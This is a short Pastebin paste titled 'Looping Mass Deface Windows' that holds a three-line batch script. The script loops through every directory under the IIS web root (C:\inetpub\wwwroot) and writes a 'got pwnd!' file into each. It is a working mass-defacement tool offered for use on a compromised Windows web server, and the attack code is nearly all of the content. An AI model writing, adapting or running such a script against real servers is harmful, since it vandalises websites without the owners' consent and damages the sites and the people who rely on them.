cdw1p

Looping Mass Deface Windows

Aug 19th, 2019
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.10 KB | None | 0 0
  1. @echo off
  2. chcp 65001 >nul
  3. for /r "C:\inetpub\wwwroot" %%d in (.) do echo got pwnd!  > "%%~dpnd\x.txt"
Advertisement
Add Comment
Please, Sign In to add comment